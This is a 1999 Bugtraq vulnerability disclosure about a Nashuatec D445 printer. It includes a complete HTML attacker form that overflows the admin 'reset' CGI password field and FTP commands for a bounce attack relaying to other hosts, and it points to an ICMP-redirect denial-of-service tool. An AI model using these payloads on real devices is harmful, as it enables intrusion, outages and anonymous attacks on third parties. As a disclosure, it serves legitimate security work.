[12248] in bugtraq
NEUROCOM: Nashuatec printer, 3 vulnerabilities found
daemon@ATHENA.MIT.EDU (gregory duchemin)
Thu Oct 14 18:44:52 1999
Message-Id: <19991014154501.8406.qmail@securityfocus.com>
Date: Thu, 14 Oct 1999 15:45:01 -0000
Reply-To: gregory duchemin <veille@NEUROCOM.COM>
From: gregory duchemin <veille@NEUROCOM.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
hi,
The NASHUATEC D445 printer is vulnerabled to many attacks.
There are 4 communs services that run in a standard
configuration: httpd, ftpd, telnetd, printer.
(tested with nmap)
I discovered last day, at least three differents ways to
attack this kind of boxes.
First, it's possible to configure remotly the server via its
own admin web server (port 80).
Naturaly the server 'll ask u for an admin password before
submiting the form to the cgi. The password field is 15
chars length but an intruder with a lightly modified copy of
the original form 'll be able to submit many more chars (
about 260 will be enough for the test ) to the cgi and
produce a buffer overflow.( see the example below )
The cgi concerned is "reset" but i suppose, every cgi are
exposed to this problem.
If our intruder decide to forge a special password with
instruction code inside he'll force the remote printer to
execute code with the target web server priviledge.
I don't have, now, all the required informations to gain
server priviledge but u may find it here very soon :)
Attacker form example:
<HTML>
<HEAD>
<TITLE>Nashuadeath</TITLE>
</HEAD>
<!-- Gregory Duchemin Aka c3rber -->
<!-- NEUROCOM -->
<!-- http://www.neurocom.com -->
<!-- 179/181 Avenue Charles de Gaulle -->
<!-- 92200 Neuilly Sur Seine -->
<!-- Tel: 01.41.43.84.84 Fax: 01.41.43.84.80 -->
<BODY>
<HR>
<CENTER><FONT SIZE=+2><big><B>NIB
450-E</B></big></FONT></CENTER>
<HR>
<CENTER><FONT SIZE=+2>Unit Serial Number
599132</FONT></CENTER>
<HR>
<H2><CENTER>Reset Unit</H2>
<HR>
<FORM ENCTYPE="x-www-form-encoded" METHOD="POST"
ACTION="http://victim-printer-ip/Forms/reset">
<B>A very big password is required to perform this function
( at least 260 chars length ).</B><BR>
<BR>
<INPUT TYPE="text" NAME="http_pwd" SIZE="100"
MAXLENGTH="1500">
<BR>
<BR>
<INPUT TYPE="SUBMIT" NAME="Submit" VALUE="T3st M3 PL3ase">
</FORM>
<P>
<HR>
<P>
<CENTER>[ <A HREF="/index">Home</A> | <A HREF="/info">Unit
Info</A> ]
</CENTER>
</BODY>
</HTML>
another flaw is present in the ftp daemon that permit the
infamous "bounce attack".
ftp printer.victim.com
user xxxxx
pass xxxxx
quote port a1,a2,a3,a4,0,25
a1.a2.a3.a4 is every other ip adress.
the ftp server doesn't check neither the type of port in the
request ( < 1024 = administrative port ) nor the ip adress
used.
So an intruder may use the service to attack some ohter
boxes anonymously.
The last one is a denial of service with an icmp redirect
storm against the printer ip stack.
Use winfreez.c to test it.
The printer 'll not respond anymore during the attack.
Have a nice day,
Gregory Duchemin.
-------------------------
NEUROCOM
http://www.neurocom.com
179/181 Avenue Charles de Gaulle
92200 Neuilly Sur Seine
Tel: 01.41.43.84.84 Fax: 01.41.43.84.80
